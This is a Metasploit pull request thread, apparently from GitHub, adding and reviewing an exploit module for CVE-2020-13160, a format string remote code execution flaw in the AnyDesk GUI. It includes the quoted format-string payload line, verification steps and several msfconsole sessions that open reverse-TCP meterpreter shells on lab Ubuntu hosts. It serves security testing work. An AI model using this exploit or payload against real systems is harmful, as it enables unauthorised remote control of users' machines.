[WIP] Add an exploit for CVE-2020-13160 (RCE in AnyDesk GUI)
rapid7/metasploit-framework pull request #13733
Opened 2020-06-17 15:32 UTC by zeroSteiner

This adds an exploit for CVE-2020-13160 which is a format string vulnerability that is remotely exploitable within the AnyDesk GUI. This vulnerability was patched in version 5.5.3.

The check method will use the discovery mechanism which is also the delivery vector for the vulnerability. After sending a discovery frame to the remote host, if AnyDesk is running, it'll respond with it's own discovery frame. This is why there's a second server UDP socket in there. It does allow the module to identify the remote hostname and the exploit method will also verify that the target OS is Linux for comaptibility.

Going to leave this as a WIP as I'd like to get around to adding an Ubuntu 20.04 target. I don't have any logic or function changes planned though so in that sense the code is ready for review.

## Verification

- [ ] Install the `anydesk_5.5.2-1_amd64.deb` package from the [archive][1] on Ubuntu 18.04 x64
    - [ ] Run the AnyDesk UI and leave it running, a red and white Window should be displayed
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/misc/cve_2020_13160_anydesk`
- [ ] Set the options appropriately
- [ ] Run the `check` method, see the remote hostname is identified
- [ ] Run the `exploit` method, receive a shell after about 5 seconds

## Example

```
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > use exploit/linux/misc/cve_2020_13160_anydesk 
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.33
RHOSTS => 192.168.159.33
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > check
[*] 192.168.159.33:50001 - The service is running, but could not be validated. Remote hostname: ubuntu
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > exploit
[*] Started reverse TCP handler on 192.168.250.87:4444 
[*] Discovered the remote service (hostname: ubuntu, os: linux)
[*] Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...
[*] Sending stage (3012516 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.87:4444 -> 192.168.250.237:51044) at 2020-06-17 10:21:44 -0400
meterpreter > getuid
Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.33
OS           : Ubuntu 18.04 (Linux 5.3.0-59-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
 
[1]: https://download.anydesk.com/linux/

2020-06-23 15:58 UTC, egypt commented
> which is a format string vulnerability that is remotely exploitable

![image](https://user-images.githubusercontent.com/287967/85426717-742f1b00-b540-11ea-945f-d1fb0c0f788e.png)

2020-06-25 20:23 UTC, zeroSteiner commented
Got the Ubuntu 20.04 target added and I've applied the linting operations from rubycop. Marked as ready for review.

```
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > show options 

Module options (exploit/linux/misc/cve_2020_13160_anydesk):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.159.34   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   50001            yes       The target port (UDP)


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Anydesk 5.5.2 Ubuntu 20.04 x64


msf5 exploit(linux/misc/cve_2020_13160_anydesk) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Discovered the remote service (hostname: ubuntu, os: linux)
[*] Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...
[*] Sending stage (3012516 bytes) to 192.168.159.34
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.34:59676) at 2020-06-25 16:17:30 -0400

meterpreter > getuid
Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo 
Computer     : 192.168.159.34
OS           : Ubuntu 20.04 (Linux 5.4.0-39-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.33
RHOSTS => 192.168.159.33
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set TARGET 2
TARGET => 2
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Discovered the remote service (hostname: ubuntu, os: linux)
[*] Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...
[*] Sending stage (3012516 bytes) to 192.168.159.33
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.33:36024) at 2020-06-25 16:17:54 -0400

meterpreter > getuid
Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.33
OS           : Ubuntu 18.04 (Linux 5.3.0-59-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

FWIW the Ubuntu 20.04 target works on a stock install using `ubuntu-20.04-desktop-amd64.iso` and continues to work after all updates (other than AnyDesk of course) as of today have been applied.

2020-06-26 15:15 UTC, wvu-r7 commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +    udp_sock.put(build_discover_packet(hn, "\x85\xfe%#{target['time@got.plt']}x%#{target['stkref1']}$ln", 'ad', 'main'))
Do you think you can document this format string or try to randomize some of it, particularly the Unicode?

> The beginning of the hostname ('\x85\xfe') is an invalid UTF-8 sequence, which will trigger the format string vulnerability (any other invalid UTF-8 sequence can be used here).

https://devel0pment.de/?p=1881

2020-06-26 17:09 UTC, zeroSteiner commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +    udp_sock.put(build_discover_packet(hn, "\x85\xfe%#{target['time@got.plt']}x%#{target['stkref1']}$ln", 'ad', 'main'))
Randomization is a good idea, I added that in commit bb33bc9c62b315869ea8e43030b0c83589e4ead9.

Before landing on 0x8000-0x9000, I also tried 0x5000-0x9000 and 0x7000-0x9000 which both failed on the first attempt. They crashed the application, so I suspect they modified the length and broke the alignment. 0x8000-0x9000 worked for me 5/5 tries though and since the string is eval'ed twice, that's 10/10 random attempts with no broken offsets.

2020-07-01 18:50 UTC, wvu-r7 commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +
```suggestion
```

2020-07-01 18:52 UTC, wvu-r7 commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +    disconnect_udp
```suggestion
  ensure
    disconnect_udp
```

2020-07-01 19:07 UTC, wvu-r7 commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +          ],
```suggestion
          ],
          'DefaultTarget' => 0,
```

2020-07-01 19:07 UTC, wvu-r7 commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +# Current source: https://github.com/rapid7/metasploit-framework
```suggestion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
```

2020-07-01 19:10 UTC, wvu-r7 commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +          crafted discovery packet, an attacker can corrupt the front end process when it loads or refreshes. While the
```suggestion
          crafted discovery packet, an attacker can corrupt the frontend process when it loads or refreshes. While the
```

2020-07-01 19:11 UTC, wvu-r7 commented on documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md
> +target to respond with it's own discovery frame. Each of these are sent from a random source port to the default AnyDesk
```suggestion
The `check` method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the
target to respond with its own discovery frame. Each of these are sent from a random source port to the default AnyDesk
```

2020-07-01 19:12 UTC, wvu-r7 commented on documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md
> +1. Start msfconsole
```suggestion
1. Start `msfconsole`
```

2020-07-01 19:14 UTC, wvu-r7 commented on documentation/modules/exploit/linux/misc/cve_2020_13160_anydesk.md
> +Example steps in this format (is also in the PR):
```suggestion
```

2020-07-01 19:21 UTC, wvu requested changes
If you can make the changes and retest, I'll be happy to land this.

2020-07-01 19:24 UTC, zeroSteiner commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +          ],
Is it necessary to explicitly specify this? It's showing up as already defaulting to target 0 / "Anydesk 5.5.2 Ubuntu 20.04 x64" which is what I would want as the default.

2020-07-01 19:26 UTC, wvu-r7 commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +          ],
It is not necessary for the function of the code, but it is useful for anyone reading the code. Feel free to disregard. I prefer to be explicit.

2020-07-01 19:27 UTC, zeroSteiner commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +          ],
Nevermind, disregard that. You're right it is necessary.

2020-07-01 19:29 UTC, wvu-r7 commented on modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
> +          ],
Oof, that must have been Dave's changes. You got `Automatic`? Yeah... Necessary now.

2020-07-01 19:42 UTC, zeroSteiner commented
Test results for Ubuntu 20.04 after the latest round of changes:

```
msf5 > use exploit/linux/misc/cve_2020_13160_anydesk 
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > show options 

Module options (exploit/linux/misc/cve_2020_13160_anydesk):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   50001            yes       The target port (UDP)


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.250.87   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Anydesk 5.5.2 Ubuntu 20.04 x64


msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set RHOSTS 192.168.159.34
RHOSTS => 192.168.159.34
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > check
[*] 192.168.159.34:50001 - The service is running, but could not be validated. Remote hostname: ubuntu
msf5 exploit(linux/misc/cve_2020_13160_anydesk) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Discovered the remote service (hostname: ubuntu, os: linux)
[*] Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...
[*] Sending stage (3012516 bytes) to 192.168.159.34
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.34:57718) at 2020-07-01 15:41:34 -0400

meterpreter > getuid
Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.34
OS           : Ubuntu 20.04 (Linux 5.4.0-39-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

```

2020-07-01 19:45 UTC, wvu approved these changes

2020-07-01 19:55 UTC, merged

2020-07-01 20:06 UTC, wvu-r7 commented
# Release Notes

This adds an exploit for [CVE-2020-13160](https://nvd.nist.gov/vuln/detail/CVE-2020-13160), a format string vulnerability in the AnyDesk GUI that is remotely exploitable.